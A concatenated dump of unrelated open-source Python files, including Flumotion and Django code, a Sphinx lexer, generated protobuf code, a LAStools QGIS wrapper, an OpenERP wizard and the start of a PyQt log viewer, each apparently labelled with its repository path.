# See "LICENSE.Flumotion" in the source distribution for more information.
# Headers in this file shall remain intact.
from flumotion.common.testsuite import TestCase
from flumotion.common.xmlwriter import cmpComponentType, XMLWriter
class TestXMLWriter(TestCase):
def testIndent(self):
xw = XMLWriter()
xw.pushTag('tag',
[('long-attribute-name-number-one', 'value'),
('long-attribute-name-number-two', 'value'),
('long-attribute-name-number-three', 'value')])
xw.popTag()
self.assertEquals(
xw.getXML(),
('<tag long-attribute-name-number-one="value"\n'
' long-attribute-name-number-two="value"\n'
' long-attribute-name-number-three="value">\n'
'</tag>\n'))
def testPush(self):
xw = XMLWriter()
xw.pushTag('first')
self.assertEquals(xw.getXML(), "<first>\n")
xw.popTag()
self.assertEquals(xw.getXML(), "<first>\n</first>\n")
xw = XMLWriter()
xw.pushTag('first', [('attr1', 'a'),
('attr2', 'b')])
self.assertEquals(xw.getXML(), '<first attr1="a" attr2="b">\n')
xw.popTag()
def testWriteLine(self):
xw = XMLWriter()
xw.writeLine('foo')
self.assertEquals(xw.getXML(), 'foo\n')
xw.pushTag('tag')
self.assertEquals(xw.getXML(), 'foo\n<tag>\n')
xw.writeLine('bar')
self.assertEquals(xw.getXML(), 'foo\n<tag>\n bar\n')
def testWriteTag(self):
xw = XMLWriter()
xw.pushTag('tag')
xw.writeTag('tag2')
self.assertEquals(xw.getXML(),
'<tag>\n <tag2/>\n')
def testWriteTagAttr(self):
xw = XMLWriter()
xw.pushTag('tag')
xw.writeTag('tag2', [('attr', 'value')])
self.assertEquals(xw.getXML(),
'<tag>\n <tag2 attr="value"/>\n')
def testWriteTagAttrData(self):
xw = XMLWriter()
xw.pushTag('tag')
xw.writeTag('tag2', [('attr', 'value')], data='data')
self.assertEquals(xw.getXML(),
'<tag>\n <tag2 attr="value">data</tag2>\n')
def testWriteTagData(self):
xw = XMLWriter()
xw.pushTag('tag')
xw.writeTag('tag2', data='data')
self.assertEquals(xw.getXML(),
'<tag>\n <tag2>data</tag2>\n')
class TestCompareComponentTypes(TestCase):
def testEncoderMuxer(self):
components = ['ogg-muxer',
'vorbis-encoder',
'theora-encoder']
components.sort(cmp=cmpComponentType)
self.assertEquals(components,
['theora-encoder',
'vorbis-encoder',
'ogg-muxer'],
components)
def testProducerEncoderMuxer(self):
components = ['ogg-muxer',
'vorbis-encoder',
'videotest-producer',
'theora-encoder']
components.sort(cmp=cmpComponentType)
self.assertEquals(components,
['videotest-producer',
'theora-encoder',
'vorbis-encoder',
'ogg-muxer'],
components)
def testComplete(self):
components = ['ogg-muxer',
'http-streamer',
'overlay-converter',
'vorbis-encoder',
'videotest-producer',
'dirac-encoder',
'audiotest-producer']
components.sort(cmp=cmpComponentType)
self.assertEquals(components,
['audiotest-producer',
'videotest-producer',
'overlay-converter',
'dirac-encoder',
'vorbis-encoder',
'ogg-muxer',
'http-streamer'],
components)
|
asedunov/intellij-community | refs/heads/master | python/lib/Lib/site-packages/django/contrib/admin/filterspecs.py | 78 | """
FilterSpec encapsulates the logic for displaying filters in the Django admin.
Filters are specified in models with the "list_filter" option.
Each filter subclass knows how to display a filter for a field that passes a
certain test -- e.g. being a DateField or ForeignKey.
"""
from django.db import models
from django.utils.encoding import smart_unicode, iri_to_uri
from django.utils.translation import ugettext as _
from django.utils.html import escape
from django.utils.safestring import mark_safe
from django.contrib.admin.util import get_model_from_relation, \
reverse_field_path, get_limit_choices_to_from_path
import datetime
class FilterSpec(object):
filter_specs = []
def __init__(self, f, request, params, model, model_admin,
field_path=None):
self.field = f
self.params = params
self.field_path = field_path
if field_path is None:
if isinstance(f, models.related.RelatedObject):
self.field_path = f.var_name
else:
self.field_path = f.name
def register(cls, test, factory):
cls.filter_specs.append((test, factory))
register = classmethod(register)
def create(cls, f, request, params, model, model_admin, field_path=None):
for test, factory in cls.filter_specs:
if test(f):
return factory(f, request, params, model, model_admin,
field_path=field_path)
create = classmethod(create)
def has_output(self):
return True
def choices(self, cl):
raise NotImplementedError()
def title(self):
return self.field.verbose_name
def output(self, cl):
t = []
if self.has_output():
t.append(_(u'<h3>By %s:</h3>\n<ul>\n') % escape(self.title()))
for choice in self.choices(cl):
t.append(u'<li%s><a href="%s">%s</a></li>\n' % \
((choice['selected'] and ' class="selected"' or ''),
iri_to_uri(choice['query_string']),
choice['display']))
t.append('</ul>\n\n')
return mark_safe("".join(t))
class RelatedFilterSpec(FilterSpec):
def __init__(self, f, request, params, model, model_admin,
field_path=None):
super(RelatedFilterSpec, self).__init__(
f, request, params, model, model_admin, field_path=field_path)
other_model = get_model_from_relation(f)
if isinstance(f, (models.ManyToManyField,
models.related.RelatedObject)):
# no direct field on this model, get name from other model
self.lookup_title = other_model._meta.verbose_name
else:
self.lookup_title = f.verbose_name # use field name
rel_name = other_model._meta.pk.name
self.lookup_kwarg = '%s__%s__exact' % (self.field_path, rel_name)
self.lookup_val = request.GET.get(self.lookup_kwarg, None)
self.lookup_choices = f.get_choices(include_blank=False)
def has_output(self):
return len(self.lookup_choices) > 1
def title(self):
return self.lookup_title
def choices(self, cl):
yield {'selected': self.lookup_val is None,
'query_string': cl.get_query_string({}, [self.lookup_kwarg]),
'display': _('All')}
for pk_val, val in self.lookup_choices:
yield {'selected': self.lookup_val == smart_unicode(pk_val),
'query_string': cl.get_query_string({self.lookup_kwarg: pk_val}),
'display': val}
FilterSpec.register(lambda f: (
hasattr(f, 'rel') and bool(f.rel) or
isinstance(f, models.related.RelatedObject)), RelatedFilterSpec)
class ChoicesFilterSpec(FilterSpec):
def __init__(self, f, request, params, model, model_admin,
field_path=None):
super(ChoicesFilterSpec, self).__init__(f, request, params, model,
model_admin,
field_path=field_path)
self.lookup_kwarg = '%s__exact' % self.field_path
self.lookup_val = request.GET.get(self.lookup_kwarg, None)
def choices(self, cl):
yield {'selected': self.lookup_val is None,
'query_string': cl.get_query_string({}, [self.lookup_kwarg]),
'display': _('All')}
for k, v in self.field.flatchoices:
yield {'selected': smart_unicode(k) == self.lookup_val,
'query_string': cl.get_query_string({self.lookup_kwarg: k}),
'display': v}
FilterSpec.register(lambda f: bool(f.choices), ChoicesFilterSpec)
class DateFieldFilterSpec(FilterSpec):
def __init__(self, f, request, params, model, model_admin,
field_path=None):
super(DateFieldFilterSpec, self).__init__(f, request, params, model,
model_admin,
field_path=field_path)
self.field_generic = '%s__' % self.field_path
self.date_params = dict([(k, v) for k, v in params.items() if k.startswith(self.field_generic)])
today = datetime.date.today()
one_week_ago = today - datetime.timedelta(days=7)
today_str = isinstance(self.field, models.DateTimeField) and today.strftime('%Y-%m-%d 23:59:59') or today.strftime('%Y-%m-%d')
self.links = (
(_('Any date'), {}),
(_('Today'), {'%s__year' % self.field_path: str(today.year),
'%s__month' % self.field_path: str(today.month),
'%s__day' % self.field_path: str(today.day)}),
(_('Past 7 days'), {'%s__gte' % self.field_path:
one_week_ago.strftime('%Y-%m-%d'),
'%s__lte' % self.field_path: today_str}),
(_('This month'), {'%s__year' % self.field_path: str(today.year),
'%s__month' % self.field_path: str(today.month)}),
(_('This year'), {'%s__year' % self.field_path: str(today.year)})
)
def title(self):
return self.field.verbose_name
def choices(self, cl):
for title, param_dict in self.links:
yield {'selected': self.date_params == param_dict,
'query_string': cl.get_query_string(param_dict, [self.field_generic]),
'display': title}
FilterSpec.register(lambda f: isinstance(f, models.DateField), DateFieldFilterSpec)
class BooleanFieldFilterSpec(FilterSpec):
def __init__(self, f, request, params, model, model_admin,
field_path=None):
super(BooleanFieldFilterSpec, self).__init__(f, request, params, model,
model_admin,
field_path=field_path)
self.lookup_kwarg = '%s__exact' % self.field_path
self.lookup_kwarg2 = '%s__isnull' % self.field_path
self.lookup_val = request.GET.get(self.lookup_kwarg, None)
self.lookup_val2 = request.GET.get(self.lookup_kwarg2, None)
def title(self):
return self.field.verbose_name
def choices(self, cl):
for k, v in ((_('All'), None), (_('Yes'), '1'), (_('No'), '0')):
yield {'selected': self.lookup_val == v and not self.lookup_val2,
'query_string': cl.get_query_string({self.lookup_kwarg: v}, [self.lookup_kwarg2]),
'display': k}
if isinstance(self.field, models.NullBooleanField):
yield {'selected': self.lookup_val2 == 'True',
'query_string': cl.get_query_string({self.lookup_kwarg2: 'True'}, [self.lookup_kwarg]),
'display': _('Unknown')}
FilterSpec.register(lambda f: isinstance(f, models.BooleanField) or isinstance(f, models.NullBooleanField), BooleanFieldFilterSpec)
# This should be registered last, because it's a last resort. For example,
# if a field is eligible to use the BooleanFieldFilterSpec, that'd be much
# more appropriate, and the AllValuesFilterSpec won't get used for it.
class AllValuesFilterSpec(FilterSpec):
def __init__(self, f, request, params, model, model_admin,
field_path=None):
super(AllValuesFilterSpec, self).__init__(f, request, params, model,
model_admin,
field_path=field_path)
self.lookup_val = request.GET.get(self.field_path, None)
parent_model, reverse_path = reverse_field_path(model, field_path)
queryset = parent_model._default_manager.all()
# optional feature: limit choices base on existing relationships
# queryset = queryset.complex_filter(
# {'%s__isnull' % reverse_path: False})
limit_choices_to = get_limit_choices_to_from_path(model, field_path)
queryset = queryset.filter(limit_choices_to)
self.lookup_choices = \
queryset.distinct().order_by(f.name).values(f.name)
def title(self):
return self.field.verbose_name
def choices(self, cl):
yield {'selected': self.lookup_val is None,
'query_string': cl.get_query_string({}, [self.field_path]),
'display': _('All')}
for val in self.lookup_choices:
val = smart_unicode(val[self.field.name])
yield {'selected': self.lookup_val == val,
'query_string': cl.get_query_string({self.field_path: val}),
'display': val}
FilterSpec.register(lambda f: True, AllValuesFilterSpec)
|
makinacorpus/django | refs/heads/master | tests/defer_regress/models.py | 59 | """
Regression tests for defer() / only() behavior.
"""
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
@python_2_unicode_compatible
class Item(models.Model):
name = models.CharField(max_length=15)
text = models.TextField(default="xyzzy")
value = models.IntegerField()
other_value = models.IntegerField(default=0)
def __str__(self):
return self.name
class RelatedItem(models.Model):
item = models.ForeignKey(Item)
class Child(models.Model):
name = models.CharField(max_length=10)
value = models.IntegerField()
@python_2_unicode_compatible
class Leaf(models.Model):
name = models.CharField(max_length=10)
child = models.ForeignKey(Child)
second_child = models.ForeignKey(Child, related_name="other", null=True)
value = models.IntegerField(default=42)
def __str__(self):
return self.name
class ResolveThis(models.Model):
num = models.FloatField()
name = models.CharField(max_length=16)
class Proxy(Item):
class Meta:
proxy = True
@python_2_unicode_compatible
class SimpleItem(models.Model):
name = models.CharField(max_length=15)
value = models.IntegerField()
def __str__(self):
return self.name
class Feature(models.Model):
item = models.ForeignKey(SimpleItem)
class SpecialFeature(models.Model):
feature = models.ForeignKey(Feature)
class OneToOneItem(models.Model):
item = models.OneToOneField(Item, related_name="one_to_one_item")
name = models.CharField(max_length=15)
class ItemAndSimpleItem(models.Model):
item = models.ForeignKey(Item)
simple = models.ForeignKey(SimpleItem)
class Profile(models.Model):
profile1 = models.CharField(max_length=1000, default='profile1')
class Location(models.Model):
location1 = models.CharField(max_length=1000, default='location1')
class Item(models.Model):
pass
class Request(models.Model):
profile = models.ForeignKey(Profile, null=True, blank=True)
location = models.ForeignKey(Location)
items = models.ManyToManyField(Item)
request1 = models.CharField(default='request1', max_length=1000)
request2 = models.CharField(default='request2', max_length=1000)
request3 = models.CharField(default='request3', max_length=1000)
request4 = models.CharField(default='request4', max_length=1000)
|
dex4er/django | refs/heads/1.6.x | tests/defer_regress/models.py | 59 | """
Regression tests for defer() / only() behavior.
"""
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
@python_2_unicode_compatible
class Item(models.Model):
name = models.CharField(max_length=15)
text = models.TextField(default="xyzzy")
value = models.IntegerField()
other_value = models.IntegerField(default=0)
def __str__(self):
return self.name
class RelatedItem(models.Model):
item = models.ForeignKey(Item)
class Child(models.Model):
name = models.CharField(max_length=10)
value = models.IntegerField()
@python_2_unicode_compatible
class Leaf(models.Model):
name = models.CharField(max_length=10)
child = models.ForeignKey(Child)
second_child = models.ForeignKey(Child, related_name="other", null=True)
value = models.IntegerField(default=42)
def __str__(self):
return self.name
class ResolveThis(models.Model):
num = models.FloatField()
name = models.CharField(max_length=16)
class Proxy(Item):
class Meta:
proxy = True
@python_2_unicode_compatible
class SimpleItem(models.Model):
name = models.CharField(max_length=15)
value = models.IntegerField()
def __str__(self):
return self.name
class Feature(models.Model):
item = models.ForeignKey(SimpleItem)
class SpecialFeature(models.Model):
feature = models.ForeignKey(Feature)
class OneToOneItem(models.Model):
item = models.OneToOneField(Item, related_name="one_to_one_item")
name = models.CharField(max_length=15)
class ItemAndSimpleItem(models.Model):
item = models.ForeignKey(Item)
simple = models.ForeignKey(SimpleItem)
class Profile(models.Model):
profile1 = models.CharField(max_length=1000, default='profile1')
class Location(models.Model):
location1 = models.CharField(max_length=1000, default='location1')
class Item(models.Model):
pass
class Request(models.Model):
profile = models.ForeignKey(Profile, null=True, blank=True)
location = models.ForeignKey(Location)
items = models.ManyToManyField(Item)
request1 = models.CharField(default='request1', max_length=1000)
request2 = models.CharField(default='request2', max_length=1000)
request3 = models.CharField(default='request3', max_length=1000)
request4 = models.CharField(default='request4', max_length=1000)
|
yade/trunk | refs/heads/master | doc/sphinx/ipython_console_highlighting.py | 112 | """reST directive for syntax-highlighting ipython interactive sessions.
XXX - See what improvements can be made based on the new (as of Sept 2009)
'pycon' lexer for the python console. At the very least it will give better
highlighted tracebacks.
"""
#-----------------------------------------------------------------------------
# Needed modules
# Standard library
import re
# Third party
from pygments.lexer import Lexer, do_insertions
from pygments.lexers.agile import (PythonConsoleLexer, PythonLexer,
PythonTracebackLexer)
from pygments.token import Comment, Generic
from sphinx import highlighting
#-----------------------------------------------------------------------------
# Global constants
line_re = re.compile('.*?\n')
#-----------------------------------------------------------------------------
# Code begins - classes and functions
class IPythonConsoleLexer(Lexer):
"""
For IPython console output or doctests, such as:
.. sourcecode:: ipython
In [1]: a = 'foo'
In [2]: a
Out[2]: 'foo'
In [3]: print a
foo
In [4]: 1 / 0
Notes:
- Tracebacks are not currently supported.
- It assumes the default IPython prompts, not customized ones.
"""
name = 'IPython console session'
aliases = ['ipython']
mimetypes = ['text/x-ipython-console']
input_prompt = re.compile("(In \[[0-9]+\]: )|( \.\.\.+:)")
output_prompt = re.compile("(Out\[[0-9]+\]: )|( \.\.\.+:)")
continue_prompt = re.compile(" \.\.\.+:")
tb_start = re.compile("\-+")
def get_tokens_unprocessed(self, text):
pylexer = PythonLexer(**self.options)
tblexer = PythonTracebackLexer(**self.options)
curcode = ''
insertions = []
for match in line_re.finditer(text):
line = match.group()
input_prompt = self.input_prompt.match(line)
continue_prompt = self.continue_prompt.match(line.rstrip())
output_prompt = self.output_prompt.match(line)
if line.startswith("#"):
insertions.append((len(curcode),
[(0, Comment, line)]))
elif input_prompt is not None:
insertions.append((len(curcode),
[(0, Generic.Prompt, input_prompt.group())]))
curcode += line[input_prompt.end():]
elif continue_prompt is not None:
insertions.append((len(curcode),
[(0, Generic.Prompt, continue_prompt.group())]))
curcode += line[continue_prompt.end():]
elif output_prompt is not None:
                # Use the 'error' token for output.  We should probably make
                # our own token, but error is typically in a bright color like
                # red, so it works fine for our output prompts.
insertions.append((len(curcode),
[(0, Generic.Error, output_prompt.group())]))
curcode += line[output_prompt.end():]
else:
if curcode:
for item in do_insertions(insertions,
pylexer.get_tokens_unprocessed(curcode)):
yield item
curcode = ''
insertions = []
yield match.start(), Generic.Output, line
if curcode:
for item in do_insertions(insertions,
pylexer.get_tokens_unprocessed(curcode)):
yield item
def setup(app):
"""Setup as a sphinx extension."""
# This is only a lexer, so adding it below to pygments appears sufficient.
# But if somebody knows that the right API usage should be to do that via
# sphinx, by all means fix it here. At least having this setup.py
# suppresses the sphinx warning we'd get without it.
pass
#-----------------------------------------------------------------------------
# Register the extension as a valid pygments lexer
highlighting.lexers['ipython'] = IPythonConsoleLexer()
|
benesch/adspygoogle.dfp | refs/heads/master | adspygoogle/SOAPpy/wstools/__init__.py | 14 | #! /usr/bin/env python
"""WSDL parsing services package for Web Services for Python."""
ident = "$Id: __init__.py,v 1.11 2004/12/07 15:54:53 blunck2 Exp $"
import WSDLTools
import XMLname
import logging
|
polzy/PokeManager | refs/heads/master | pogo/POGOProtos/Settings/Master/Pokemon/StatsAttributes_pb2.py | 16 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: POGOProtos/Settings/Master/Pokemon/StatsAttributes.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='POGOProtos/Settings/Master/Pokemon/StatsAttributes.proto',
package='POGOProtos.Settings.Master.Pokemon',
syntax='proto3',
serialized_pb=_b('\n8POGOProtos/Settings/Master/Pokemon/StatsAttributes.proto\x12\"POGOProtos.Settings.Master.Pokemon\"n\n\x0fStatsAttributes\x12\x14\n\x0c\x62\x61se_stamina\x18\x01 \x01(\x05\x12\x13\n\x0b\x62\x61se_attack\x18\x02 \x01(\x05\x12\x14\n\x0c\x62\x61se_defense\x18\x03 \x01(\x05\x12\x1a\n\x12\x64odge_energy_delta\x18\x08 \x01(\x05\x62\x06proto3')
)
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_STATSATTRIBUTES = _descriptor.Descriptor(
name='StatsAttributes',
full_name='POGOProtos.Settings.Master.Pokemon.StatsAttributes',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='base_stamina', full_name='POGOProtos.Settings.Master.Pokemon.StatsAttributes.base_stamina', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='base_attack', full_name='POGOProtos.Settings.Master.Pokemon.StatsAttributes.base_attack', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='base_defense', full_name='POGOProtos.Settings.Master.Pokemon.StatsAttributes.base_defense', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='dodge_energy_delta', full_name='POGOProtos.Settings.Master.Pokemon.StatsAttributes.dodge_energy_delta', index=3,
number=8, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=96,
serialized_end=206,
)
DESCRIPTOR.message_types_by_name['StatsAttributes'] = _STATSATTRIBUTES
StatsAttributes = _reflection.GeneratedProtocolMessageType('StatsAttributes', (_message.Message,), dict(
DESCRIPTOR = _STATSATTRIBUTES,
__module__ = 'POGOProtos.Settings.Master.Pokemon.StatsAttributes_pb2'
# @@protoc_insertion_point(class_scope:POGOProtos.Settings.Master.Pokemon.StatsAttributes)
))
_sym_db.RegisterMessage(StatsAttributes)
# @@protoc_insertion_point(module_scope)
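The descriptor above registers a proto3 message whose four fields are plain varint-encoded int32s. A minimal sketch of that wire framing, independent of the protobuf runtime (the field numbers 1, 2, 3 and 8 come from the descriptor above; the helper names are illustrative and handle non-negative values only):

```python
def encode_varint(value):
    # proto3 base-128 varint: 7 payload bits per byte, MSB set on continuation
    out = bytearray()
    while True:
        byte = value & 0x7F
        value >>= 7
        if value:
            out.append(byte | 0x80)
        else:
            out.append(byte)
            return bytes(out)

def encode_int32_field(field_number, value):
    # tag = varint((field_number << 3) | wire_type); wire type 0 means varint
    return encode_varint((field_number << 3) | 0) + encode_varint(value)

# StatsAttributes{base_stamina: 90, base_attack: 126} on the wire
payload = encode_int32_field(1, 90) + encode_int32_field(2, 126)
```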
|
hnaoto/stuff | refs/heads/master | stuff/migrations/0005_user_auth.py | 2 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('stuff', '0004_auto_20151021_2309'),
]
operations = [
migrations.AddField(
model_name='user',
name='auth',
field=models.ForeignKey(unique=True, null=True, to='stuff.Authenticator', blank=True),
preserve_default=True,
),
]
|
kennedyshead/home-assistant | refs/heads/dev | homeassistant/components/mqtt_json/__init__.py | 36 | """The mqtt_json component."""
|
SebDieBln/QGIS | refs/heads/master | python/plugins/processing/algs/lidar/lastools/lasnoisePro.py | 12 | # -*- coding: utf-8 -*-
"""
***************************************************************************
lasnoisePro.py
---------------------
Date : October 2014
Copyright : (C) 2014 by Martin Isenburg
Email : martin near rapidlasso point com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Martin Isenburg'
__date__ = 'October 2014'
__copyright__ = '(C) 2014, Martin Isenburg'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
from LAStoolsUtils import LAStoolsUtils
from LAStoolsAlgorithm import LAStoolsAlgorithm
from processing.core.parameters import ParameterNumber
from processing.core.parameters import ParameterSelection
class lasnoisePro(LAStoolsAlgorithm):
ISOLATED = "ISOLATED"
STEP_XY = "STEP_XY"
STEP_Z = "STEP_Z"
OPERATION = "OPERATION"
OPERATIONS = ["classify", "remove"]
CLASSIFY_AS = "CLASSIFY_AS"
def defineCharacteristics(self):
self.name, self.i18n_name = self.trAlgorithm('lasnoisePro')
self.group, self.i18n_group = self.trAlgorithm('LAStools Production')
self.addParametersPointInputFolderGUI()
self.addParameter(ParameterNumber(lasnoisePro.ISOLATED,
self.tr("isolated if surrounding cells have only"), 0, None, 5))
self.addParameter(ParameterNumber(lasnoisePro.STEP_XY,
self.tr("resolution of isolation grid in xy"), 0, None, 4.0))
self.addParameter(ParameterNumber(lasnoisePro.STEP_Z,
self.tr("resolution of isolation grid in z"), 0, None, 4.0))
self.addParameter(ParameterSelection(lasnoisePro.OPERATION,
self.tr("what to do with isolated points"), lasnoisePro.OPERATIONS, 0))
self.addParameter(ParameterNumber(lasnoisePro.CLASSIFY_AS,
self.tr("classify as"), 0, None, 7))
self.addParametersOutputDirectoryGUI()
self.addParametersOutputAppendixGUI()
self.addParametersPointOutputFormatGUI()
self.addParametersAdditionalGUI()
self.addParametersCoresGUI()
self.addParametersVerboseGUI()
def processAlgorithm(self, progress):
commands = [os.path.join(LAStoolsUtils.LAStoolsPath(), "bin", "lasnoise")]
self.addParametersVerboseCommands(commands)
self.addParametersPointInputFolderCommands(commands)
isolated = self.getParameterValue(lasnoisePro.ISOLATED)
commands.append("-isolated")
commands.append(unicode(isolated))
step_xy = self.getParameterValue(lasnoisePro.STEP_XY)
commands.append("-step_xy")
commands.append(unicode(step_xy))
step_z = self.getParameterValue(lasnoisePro.STEP_Z)
commands.append("-step_z")
commands.append(unicode(step_z))
operation = self.getParameterValue(lasnoisePro.OPERATION)
if operation != 0:
commands.append("-remove_noise")
else:
commands.append("-classify_as")
classify_as = self.getParameterValue(lasnoisePro.CLASSIFY_AS)
commands.append(unicode(classify_as))
self.addParametersOutputDirectoryCommands(commands)
self.addParametersOutputAppendixCommands(commands)
self.addParametersPointOutputFormatCommands(commands)
self.addParametersAdditionalCommands(commands)
self.addParametersCoresCommands(commands)
LAStoolsUtils.runLAStools(commands, progress)
|
Endika/account-financial-reporting | refs/heads/8.0 | account_financial_report_webkit/wizard/print_journal.py | 30 | # -*- coding: utf-8 -*-
##############################################################################
#
# account_financial_report_webkit module for OpenERP
# Copyright (C) 2012 SYLEAM Info Services (<http://www.syleam.fr/>)
# Sebastien LANGE <sebastien.lange@syleam.fr>
#
# This file is a part of account_financial_report_webkit
#
# account_financial_report_webkit is free software: you can redistribute it
# and/or modify it under the terms of the GNU Affero General Public License
# as published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# account_financial_report_webkit is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, orm
import time
class AccountReportPrintJournalWizard(orm.TransientModel):
"""Will launch print journal report and pass requiered args"""
_inherit = "account.common.account.report"
_name = "print.journal.webkit"
_description = "Journals Report"
_columns = {
'amount_currency': fields.boolean("With Currency",
help="It adds the currency column"),
}
_defaults = {
'amount_currency': False,
'journal_ids': False,
'filter': 'filter_period',
}
def _check_fiscalyear(self, cr, uid, ids, context=None):
obj = self.read(cr, uid, ids[0], ['fiscalyear_id', 'filter'],
context=context)
if not obj['fiscalyear_id'] and obj['filter'] == 'filter_no':
return False
return True
_constraints = [
(_check_fiscalyear, 'When no Fiscal year is selected, you must choose \
to filter by periods or by date.', ['filter']),
]
def pre_print_report(self, cr, uid, ids, data, context=None):
data = super(AccountReportPrintJournalWizard, self).\
pre_print_report(cr, uid, ids, data, context)
# will be used to attach the report on the main account
data['ids'] = [data['form']['chart_account_id']]
vals = self.read(cr, uid, ids,
['amount_currency',
'display_account',
'journal_ids'],
context=context)[0]
data['form'].update(vals)
return data
def onchange_filter(self, cr, uid, ids, filter='filter_no',
fiscalyear_id=False, context=None):
res = {}
if filter == 'filter_no':
res['value'] = {'period_from': False,
'period_to': False,
'date_from': False,
'date_to': False}
if filter == 'filter_date':
if fiscalyear_id:
fyear = self.pool.get('account.fiscalyear').browse(
cr, uid, fiscalyear_id, context=context)
date_from = fyear.date_start
date_to = fyear.date_stop > time.strftime(
'%Y-%m-%d') and time.strftime('%Y-%m-%d') \
or fyear.date_stop
else:
date_from, date_to = time.strftime(
'%Y-01-01'), time.strftime('%Y-%m-%d')
res['value'] = {'period_from': False, 'period_to':
False, 'date_from': date_from, 'date_to': date_to}
if filter == 'filter_period' and fiscalyear_id:
start_period = end_period = False
cr.execute('''
SELECT * FROM (SELECT p.id
FROM account_period p
LEFT JOIN account_fiscalyear f
ON (p.fiscalyear_id = f.id)
WHERE f.id = %s
AND COALESCE(p.special, FALSE) = FALSE
ORDER BY p.date_start ASC
LIMIT 1) AS period_start
UNION ALL
SELECT * FROM (SELECT p.id
FROM account_period p
LEFT JOIN account_fiscalyear f
ON (p.fiscalyear_id = f.id)
WHERE f.id = %s
AND p.date_start < NOW()
AND COALESCE(p.special, FALSE) = FALSE
ORDER BY p.date_stop DESC
LIMIT 1) AS period_stop''',
(fiscalyear_id, fiscalyear_id))
periods = [i[0] for i in cr.fetchall()]
if periods:
start_period = end_period = periods[0]
if len(periods) > 1:
end_period = periods[1]
res['value'] = {'period_from': start_period, 'period_to':
end_period, 'date_from': False, 'date_to': False}
return res
def _print_report(self, cursor, uid, ids, data, context=None):
context = context or {}
# we update form with display account value
data = self.pre_print_report(cursor, uid, ids, data, context=context)
return {'type': 'ir.actions.report.xml',
'report_name': 'account.account_report_print_journal_webkit',
'datas': data}
|
bplancher/odoo | refs/heads/9.0 | openerp/addons/test_uninstall/__init__.py | 2355 | # -*- coding: utf-8 -*-
import models
|
VCTLabs/openadams | refs/heads/master | oalogview.py | 1 | # -*- coding: utf-8 -*-
# $Id$
# -------------------------------------------------------------------
# Copyright 2012 Achim Köhler
#
# This file is part of openADAMS.
#
# openADAMS is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published
# by the Free Software Foundation, either version 2 of the License,
# or (at your option) any later version.
#
# openADAMS is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with openADAMS. If not, see <http://www.gnu.org/licenses/>.
# -------------------------------------------------------------------
import sys
import json
import types
import argparse
import logging
import traceback
from PyQt4 import QtGui, QtCore, QtSql
from PyQt4.QtCore import Qt
# ------------------------------------------------------------------------------
app = QtGui.QApplication(sys.argv)
app.setOrganizationName("")
app.setOrganizationDomain("macht-publik.de")
app.setApplicationName("oalogviewer")
app.setWindowIcon(QtGui.QIcon(":/icons/appicon.png"))
QtCore.QSettings.setDefaultFormat(QtCore.QSettings.IniFormat)
qtTranslator = QtCore.QTranslator()
qtTranslator.load("qt_" + QtCore.QLocale.system().name(), QtCore.QLibraryInfo.location(QtCore.QLibraryInfo.TranslationsPath))
app.installTranslator(qtTranslator)
appTranslator = QtCore.QTranslator()
appTranslator.load("nafms_" + QtCore.QLocale.system().name())
app.installTranslator(appTranslator)
# ------------------------------------------------------------------------------
import _naf_database as nafdb
import _naf_resources
import _naf_textviewer
import _naf_about
from _naf_version import VERSION, VERSION_STR, SVN_STR
WINTITLE = QtCore.QCoreApplication.translate("winTitle", "Log Viewer")
PROGNAME = 'oalogviewer'
ABOUTMSG = u"""oaviewer %s
openADAMS Log Viewer
Copyright (C) 2012 Achim Koehler
%s
""" % (VERSION, SVN_STR)
class cChangeModel(QtSql.QSqlTableModel):
def __init__(self, *args, **kwargs):
super(cChangeModel, self).__init__(*args, **kwargs)
self.setTable("changes")
self.setEditStrategy(QtSql.QSqlTableModel.OnFieldChange)
def origdata(self, index):
return super(cChangeModel, self).data(index, Qt.DisplayRole)
def data(self, index, role = Qt.DisplayRole):
"""
Overrides data() method to provide lookup values in cells
"""
if role == Qt.DisplayRole:
if index.column() == 5:
